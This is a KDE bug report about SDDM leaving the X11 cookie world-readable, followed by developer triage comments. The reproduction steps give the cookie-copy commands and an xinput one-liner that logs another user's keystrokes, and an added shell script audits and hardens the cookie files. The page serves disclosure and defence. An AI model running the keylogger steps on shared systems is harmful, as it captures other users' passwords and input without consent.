Bug 363140 - World-readable X11 Cookie, easy key logger
Summary: World-readable X11 Cookie, easy key logger
Status: RESOLVED DUPLICATE of bug 358593
Alias: None
Product: kde
Classification: I don't know
Component: general
Version: unspecified
Platform: Arch Linux Linux
Importance: NOR normal
Target Milestone: ---
Assignee: Unassigned bugs mailing-list
Depends on:
Reported: 2016-05-16 15:55 UTC by David Rumley
Modified: 2016-06-22 11:10 UTC (History)
6 users

See Also:
Latest Commit:
Version Fixed In:


Description David Rumley 2016-05-16 15:55:02 UTC
After logging in as any user, you are able to get the X11 cookie and start a key logger. This has been tested on a F23 system with KDE / SDDM (with current patches) and an Arch Linux system with KDE / SDDM (plasma-desktop 5.6.4-1).

You are able to easily get the X11 cookie.
$ sha256sum .Xauthority
fcda4502b96b622e4b7a76bf0025731b596d8056b4471676e04241b6832798b8  .Xauthority

$ sha256sum /tmp/xauth-1000-_0

The cookie is world-readable; even if you change the permissions on the cookie, the changes are gone after a reboot.
$ ls -l /tmp/xauth-1000-_0
-rw-r--r--. 1 sm sm 60 24. Feb 14:04 /tmp/xauth-1000-_0

I have another user that I log in via the text console; after that you just need to start the typical X11 keylogger.
$ cp /tmp/xauth-1000-_0 .Xauthority
$ export DISPLAY=:0
$ xinput list |  grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' |  xargs -P0 -n1 xinput test

Reproducible: Always

Steps to Reproduce:
1. Log in via the text console as any user.
2. Copy the X11 cookie over to the .Xauthority file of the user you just logged in as.
$ cp /tmp/xauth-1000-_0 .Xauthority
3. Start the typical X11 keylogger.
$ xinput list |  grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' |  xargs -P0 -n1 xinput test

Actual Results:  
After running the commands listed in "Steps to Reproduce" section, all the keyboard pushes are printed to the text console.

Expected Results:  
The X11 cookie should not be world-readable.
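Added here as a defender's check, not part of the bug report or of SDDM's own code: a POSIX shell script that audits cookie files of the form the report names (`xauth-*` under a directory such as `/tmp`) for group- or other-readable permission bits, and restricts an exposed file to owner-only access, which is the expected result the reporter describes. The directory layout, the file names and the cookie contents used in the demo are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the bug report): audit xauth cookie files for
# permissions that let other local users read them, and harden them.
# Assumes a GNU or BSD find that understands -maxdepth and symbolic -perm.

# exposed_cookies DIR
# Print every regular file named xauth-* directly under DIR whose mode
# grants read permission to group or others. Always exits 0 so callers
# can capture the list without tripping set -e.
exposed_cookies() {
    find "$1" -maxdepth 1 -type f -name 'xauth-*' \
        \( -perm -g+r -o -perm -o+r \) 2>/dev/null
    return 0
}

# cookie_exposed FILE
# Exit 0 if FILE is a regular file readable by group or others, 1 otherwise.
cookie_exposed() {
    [ -n "$(find "$1" -maxdepth 0 -type f \
        \( -perm -g+r -o -perm -o+r \) 2>/dev/null)" ]
}

# harden_cookie FILE
# Restrict FILE to owner read/write only (the state the report expects)
# and print the resulting octal mode. stat -c is GNU, stat -f is BSD.
harden_cookie() {
    chmod 600 "$1"
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Demo on a constructed directory: one exposed cookie (mode 644, as in the
# report's ls output) and one correctly protected cookie (mode 600).
demo_dir=$(mktemp -d)
printf 'constructed-cookie-bytes' > "$demo_dir/xauth-1000-_0"
chmod 644 "$demo_dir/xauth-1000-_0"
printf 'constructed-cookie-bytes' > "$demo_dir/xauth-1001-_1"
chmod 600 "$demo_dir/xauth-1001-_1"

echo "Exposed cookie files before hardening:"
exposed_cookies "$demo_dir"
for f in $(exposed_cookies "$demo_dir"); do
    echo "hardening $f -> mode $(harden_cookie "$f")"
done
echo "Exposed cookie files after hardening: '$(exposed_cookies "$demo_dir")'"
rm -rf "$demo_dir"
```

Run it as a normal user; because the check reads the mode bits rather than attempting a read, it reports the same files whether or not it runs as root. Note that, as the report says, a one-off `chmod` only lasts until the display manager recreates the file, so the lasting fix belongs in the component that writes the file, not in a cron job.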
Comment 1 Frederik Schwarzer 2016-05-16 20:59:32 UTC
www.kde.org might be the wrong Product, no?
Not sure where it would belong, though. Maybe frameworks-kinit?
Comment 2 David Rumley 2016-05-16 21:15:32 UTC
I'm not sure, I thought it belonged here. If not I can always move it.
Comment 3 Albert Astals Cid 2016-05-16 21:41:51 UTC
I'd say this is a bug in sddm.

Abusing the CC here to add Pier Luigi and Martin for confirmation.
Comment 4 Ben Cooksley 2016-05-17 09:29:20 UTC
Moving to a generic component to get this off the kde-www mailing list.
Comment 5 Christoph Feck 2016-05-17 12:00:59 UTC
Bug 329616 indicates that the xauth file might not be created by the display manager.
Comment 6 Christoph Feck 2016-05-17 12:16:16 UTC

*** This bug has been marked as a duplicate of bug 358593 ***
Comment 7 Albert Astals Cid 2016-05-17 21:04:58 UTC
That bug is only for the tmp file, not for .Xauthority?
Comment 8 Pier Luigi Fiorini 2016-05-17 21:21:34 UTC
sddm creates ~/.Xauthority with xauth, but you are talking about another file here.
This indeed might be a duplicate of 358593, as it sounds a lot like the file referenced there.
Comment 9 Albert Astals Cid 2016-05-17 21:33:43 UTC
Right, I read the code of sddm too quickly and thought it was using a QFile to create the .Xauthority file.

*** This bug has been marked as a duplicate of bug 358593 ***
Comment 10 Pier Luigi Fiorini 2016-05-17 21:50:21 UTC
sddm should set the XAUTHORITY env var; you might consider changing kdeinit to use that instead.